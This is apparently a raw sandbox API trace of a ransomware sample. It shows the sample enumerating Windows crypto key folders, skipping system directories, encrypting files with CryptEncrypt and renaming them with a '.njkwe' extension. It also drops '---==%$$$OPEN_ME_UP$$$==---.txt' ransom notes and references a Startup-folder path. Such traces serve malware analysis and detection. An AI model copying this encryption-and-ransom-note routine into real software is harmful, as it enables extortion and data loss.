(lpString1="..", lpString2="..") returned 0 [0072.615] FindNextFileW (in: hFindFile=0xc19fe0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd40a02b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x955a3652, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="MachineKeys", cAlternateFileName="MACHIN~1")) returned 1 [0072.615] lstrcmpiW (lpString1="MachineKeys", lpString2="Windows") returned -1 [0072.615] lstrcmpiW (lpString1="MachineKeys", lpString2="$Recycle.bin") returned 1 [0072.615] lstrcmpiW (lpString1="MachineKeys", lpString2="System Volume Information") returned -1 [0072.615] lstrcmpiW (lpString1="MachineKeys", lpString2="Program Files") returned -1 [0072.615] lstrcmpiW (lpString1="MachineKeys", lpString2="Program Files (x86)") returned -1 [0072.615] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys") returned 51 [0072.615] lstrcmpW (lpString1="MachineKeys", lpString2=".") returned 1 [0072.616] lstrcmpW (lpString1="MachineKeys", lpString2="..") returned 1 [0072.616] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0072.616] GetProcessHeap () returned 0xbe0000 [0072.616] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0072.616] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\*") returned 53 [0072.616] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\*", lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd40a02b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x955a3652, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a160 [0072.664] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.664] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.664] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.664] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.664] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.664] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\.") returned 53 [0072.664] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.664] FindNextFileW (in: hFindFile=0xc1a160, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd40a02b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x955a3652, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0072.664] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.664] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.664] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.664] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.664] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.664] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\..") returned 54 [0072.664] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.664] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.664] FindNextFileW (in: hFindFile=0xc1a160, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x24, ftCreationTime.dwLowDateTime=0xcb806263, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb806263, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xcbbe5f7c, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x8b1, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="f686aace6942fb7f7ceb231212eef4a4_e8d761b7-8a68-4187-8c95-75a3788ac267", cAlternateFileName="F686AA~1")) returned 1 [0072.664] lstrcmpiW (lpString1="f686aace6942fb7f7ceb231212eef4a4_e8d761b7-8a68-4187-8c95-75a3788ac267", lpString2="Windows") returned -1 [0072.664] lstrcmpiW (lpString1="f686aace6942fb7f7ceb231212eef4a4_e8d761b7-8a68-4187-8c95-75a3788ac267", lpString2="$Recycle.bin") returned 1 [0072.665] lstrcmpiW (lpString1="f686aace6942fb7f7ceb231212eef4a4_e8d761b7-8a68-4187-8c95-75a3788ac267", lpString2="System Volume Information") returned -1 [0072.665] lstrcmpiW (lpString1="f686aace6942fb7f7ceb231212eef4a4_e8d761b7-8a68-4187-8c95-75a3788ac267", lpString2="Program Files") returned -1 [0072.665] lstrcmpiW (lpString1="f686aace6942fb7f7ceb231212eef4a4_e8d761b7-8a68-4187-8c95-75a3788ac267", lpString2="Program Files (x86)") returned -1 [0072.665] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\f686aace6942fb7f7ceb231212eef4a4_e8d761b7-8a68-4187-8c95-75a3788ac267") returned 121 [0072.665] StrStrIW (lpFirst="f686aace6942fb7f7ceb231212eef4a4_e8d761b7-8a68-4187-8c95-75a3788ac267", lpSrch=".njkwe") returned 0x0 [0072.665] lstrcmpW (lpString1="f686aace6942fb7f7ceb231212eef4a4_e8d761b7-8a68-4187-8c95-75a3788ac267", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0072.665] lstrcmpW (lpString1="f686aace6942fb7f7ceb231212eef4a4_e8d761b7-8a68-4187-8c95-75a3788ac267", lpString2="taridd") returned -1 [0072.665] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\f686aace6942fb7f7ceb231212eef4a4_e8d761b7-8a68-4187-8c9", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0072.665] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\f686aace6942fb7f7ceb231212eef4a4_e8d761b7-8a68-4187-8c95-75a3788ac267" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\machinekeys\\f686aace6942fb7f7ceb231212eef4a4_e8d761b7-8a68-4187-8c95-75a3788ac267"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0072.665] FindNextFileW (in: hFindFile=0xc1a160, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x24, ftCreationTime.dwLowDateTime=0xcb806263, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb806263, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xcbbe5f7c, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x8b1, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="f686aace6942fb7f7ceb231212eef4a4_e8d761b7-8a68-4187-8c95-75a3788ac267", cAlternateFileName="F686AA~1")) returned 0 [0072.665] FindClose (in: hFindFile=0xc1a160 | out: hFindFile=0xc1a160) returned 1 [0072.665] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 83 [0072.665] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\machinekeys\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0072.667] WriteFile (in: hFile=0x434, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f054, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f054*=0x351, lpOverlapped=0x0) returned 1 [0072.668] CloseHandle (hObject=0x434) returned 1 [0072.668] GetProcessHeap () returned 0xbe0000 [0072.668] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0072.668] FindNextFileW (in: hFindFile=0xc19fe0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x4c150294, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0x4c150294, ftLastAccessTime.dwHighDateTime=0x1d32723, ftLastWriteTime.dwLowDateTime=0x4c150294, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="S-1-5-18", cAlternateFileName="")) returned 1 [0072.668] lstrcmpiW (lpString1="S-1-5-18", lpString2="Windows") returned -1 [0072.668] lstrcmpiW (lpString1="S-1-5-18", lpString2="$Recycle.bin") returned 1 [0072.668] lstrcmpiW (lpString1="S-1-5-18", lpString2="System Volume Information") returned -1 [0072.668] lstrcmpiW (lpString1="S-1-5-18", lpString2="Program Files") returned 1 [0072.668] lstrcmpiW (lpString1="S-1-5-18", lpString2="Program Files (x86)") returned 1 [0072.668] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18") returned 48 [0072.668] lstrcmpW (lpString1="S-1-5-18", lpString2=".") returned 1 [0072.668] lstrcmpW (lpString1="S-1-5-18", lpString2="..") returned 1 [0072.668] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0072.668] GetProcessHeap () returned 0xbe0000 [0072.668] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0072.669] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*") returned 50 [0072.669] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*", lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x4c150294, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0x4c150294, ftLastAccessTime.dwHighDateTime=0x1d32723, ftLastWriteTime.dwLowDateTime=0x77356b64, ftLastWriteTime.dwHighDateTime=0x1d32793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19ea0 [0072.669] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.669] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.669] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.669] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.669] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.669] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\.") returned 50 [0072.669] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.669] StrStrIW (lpFirst=".", lpSrch=".njkwe") returned 0x0 [0072.669] lstrcmpW (lpString1=".", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0072.669] lstrcmpW (lpString1=".", lpString2="taridd") returned -1 [0072.669] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\.", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0072.669] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\." (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\s-1-5-18\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0072.669] FindNextFileW (in: hFindFile=0xc19ea0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x4c150294, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0x4c150294, ftLastAccessTime.dwHighDateTime=0x1d32723, ftLastWriteTime.dwLowDateTime=0x77356b64, ftLastWriteTime.dwHighDateTime=0x1d32793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0072.669] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.669] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.669] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.669] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.669] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.669] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\..") returned 51 [0072.669] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.669] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.669] StrStrIW (lpFirst="..", lpSrch=".njkwe") returned 0x0 [0072.669] lstrcmpW (lpString1="..", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0072.669] lstrcmpW (lpString1="..", lpString2="taridd") returned -1 [0072.669] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\..", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0072.670] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\.." (normalized: "c:\\programdata\\microsoft\\crypto\\rsa"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0072.670] FindNextFileW (in: hFindFile=0xc19ea0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x24, ftCreationTime.dwLowDateTime=0x4c150294, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0x4c150294, ftLastAccessTime.dwHighDateTime=0x1d32723, ftLastWriteTime.dwLowDateTime=0x4c150294, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x38, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="4eccd106f69e31c1b12304e5463bb71d_33d770d0-06bc-47c5-8714-222cdac43a71", cAlternateFileName="4ECCD1~1")) returned 1 [0072.670] lstrcmpiW (lpString1="4eccd106f69e31c1b12304e5463bb71d_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="Windows") returned -1 [0072.670] lstrcmpiW (lpString1="4eccd106f69e31c1b12304e5463bb71d_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="$Recycle.bin") returned 1 [0072.670] lstrcmpiW (lpString1="4eccd106f69e31c1b12304e5463bb71d_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="System Volume Information") returned -1 [0072.670] lstrcmpiW (lpString1="4eccd106f69e31c1b12304e5463bb71d_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="Program Files") returned -1 [0072.670] lstrcmpiW (lpString1="4eccd106f69e31c1b12304e5463bb71d_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="Program Files (x86)") returned -1 [0072.670] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\4eccd106f69e31c1b12304e5463bb71d_33d770d0-06bc-47c5-8714-222cdac43a71") returned 118 [0072.670] StrStrIW (lpFirst="4eccd106f69e31c1b12304e5463bb71d_33d770d0-06bc-47c5-8714-222cdac43a71", lpSrch=".njkwe") returned 0x0 [0072.670] lstrcmpW (lpString1="4eccd106f69e31c1b12304e5463bb71d_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0072.670] lstrcmpW (lpString1="4eccd106f69e31c1b12304e5463bb71d_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="taridd") returned -1 [0072.670] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\4eccd106f69e31c1b12304e5463bb71d_33d770d0-06bc-47c5-8714-2", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0072.670] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\4eccd106f69e31c1b12304e5463bb71d_33d770d0-06bc-47c5-8714-222cdac43a71" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\s-1-5-18\\4eccd106f69e31c1b12304e5463bb71d_33d770d0-06bc-47c5-8714-222cdac43a71"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0072.670] GetTickCount () returned 0x1152874 [0072.670] GetTickCount () returned 0x1152874 [0072.670] GetTickCount () returned 0x1152874 [0072.670] GetTickCount () returned 0x1152874 [0072.670] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ef98*, pdwDataLen=0x380f048*=0x2c, dwBufLen=0x80 | out: pbData=0x380ef98*, pdwDataLen=0x380f048*=0x80) returned 1 [0072.671] GetProcessHeap () returned 0xbe0000 [0072.671] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4e850 [0072.671] ReadFile (in: hFile=0x438, lpBuffer=0xc4e850, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc4e850*, lpNumberOfBytesRead=0x380f04c*=0x38, lpOverlapped=0x0) returned 1 [0072.672] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffffc8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.672] WriteFile (in: hFile=0x438, lpBuffer=0xc4e850*, nNumberOfBytesToWrite=0x38, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc4e850*, lpNumberOfBytesWritten=0x380f04c*=0x38, lpOverlapped=0x0) returned 1 [0072.672] GetProcessHeap () returned 0xbe0000 [0072.672] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4e850 | out: hHeap=0xbe0000) returned 1 [0072.672] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.672] WriteFile (in: hFile=0x438, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f04c*=0x300, lpOverlapped=0x0) returned 1 [0072.673] WriteFile (in: hFile=0x438, lpBuffer=0x380ef98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x380ef98*, lpNumberOfBytesWritten=0x380f04c*=0x80, lpOverlapped=0x0) returned 1 [0072.673] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f04c*=0x4, lpOverlapped=0x0) returned 1 [0072.673] CloseHandle (hObject=0x438) returned 1 [0072.673] GetProcessHeap () returned 0xbe0000 [0072.673] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc46ed8 [0072.673] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\4eccd106f69e31c1b12304e5463bb71d_33d770d0-06bc-47c5-8714-222cdac43a71_r00t_{3sXlE5}.njkwe") returned 138 [0072.673] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\4eccd106f69e31c1b12304e5463bb71d_33d770d0-06bc-47c5-8714-222cdac43a71" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\s-1-5-18\\4eccd106f69e31c1b12304e5463bb71d_33d770d0-06bc-47c5-8714-222cdac43a71"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\4eccd106f69e31c1b12304e5463bb71d_33d770d0-06bc-47c5-8714-222cdac43a71_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\s-1-5-18\\4eccd106f69e31c1b12304e5463bb71d_33d770d0-06bc-47c5-8714-222cdac43a71_r00t_{3sxle5}.njkwe")) returned 1 [0072.674] GetProcessHeap () returned 0xbe0000 [0072.674] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc46ed8 | out: hHeap=0xbe0000) returned 1 [0072.674] FindNextFileW (in: hFindFile=0xc19ea0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x24, ftCreationTime.dwLowDateTime=0x4c150294, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0x4c150294, ftLastAccessTime.dwHighDateTime=0x1d32723, ftLastWriteTime.dwLowDateTime=0x4c150294, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x38, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="4eccd106f69e31c1b12304e5463bb71d_33d770d0-06bc-47c5-8714-222cdac43a71", cAlternateFileName="4ECCD1~1")) returned 0 [0072.674] FindClose (in: hFindFile=0xc19ea0 | out: hFindFile=0xc19ea0) returned 1 [0072.674] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 80 [0072.674] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\s-1-5-18\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0072.675] WriteFile (in: hFile=0x434, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f054, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f054*=0x351, lpOverlapped=0x0) returned 1 [0072.675] CloseHandle (hObject=0x434) returned 1 [0072.676] GetProcessHeap () returned 0xbe0000 [0072.676] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0072.676] FindNextFileW (in: hFindFile=0xc19fe0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x4c150294, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0x4c150294, ftLastAccessTime.dwHighDateTime=0x1d32723, ftLastWriteTime.dwLowDateTime=0x4c150294, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="S-1-5-18", cAlternateFileName="")) returned 0 [0072.676] FindClose (in: hFindFile=0xc19fe0 | out: hFindFile=0xc19fe0) returned 1 [0072.676] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 71 [0072.676] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0072.676] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f2dc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f2dc*=0x351, lpOverlapped=0x0) returned 1 [0072.677] CloseHandle (hObject=0x430) returned 1 [0072.677] GetProcessHeap () returned 0xbe0000 [0072.677] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0072.677] FindNextFileW (in: hFindFile=0xc1a320, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcc3cbc1c, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcc3cbc1c, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xfe648d52, ftLastWriteTime.dwHighDateTime=0x1d32770, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SystemKeys", cAlternateFileName="SYSTEM~1")) returned 1 [0072.677] lstrcmpiW (lpString1="SystemKeys", lpString2="Windows") returned -1 [0072.677] lstrcmpiW (lpString1="SystemKeys", lpString2="$Recycle.bin") returned 1 [0072.677] lstrcmpiW (lpString1="SystemKeys", lpString2="System Volume Information") returned 1 [0072.677] lstrcmpiW (lpString1="SystemKeys", lpString2="Program Files") returned 1 [0072.677] lstrcmpiW (lpString1="SystemKeys", lpString2="Program Files (x86)") returned 1 [0072.677] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\SystemKeys") returned 46 [0072.677] lstrcmpW (lpString1="SystemKeys", lpString2=".") returned 1 [0072.677] lstrcmpW (lpString1="SystemKeys", lpString2="..") returned 1 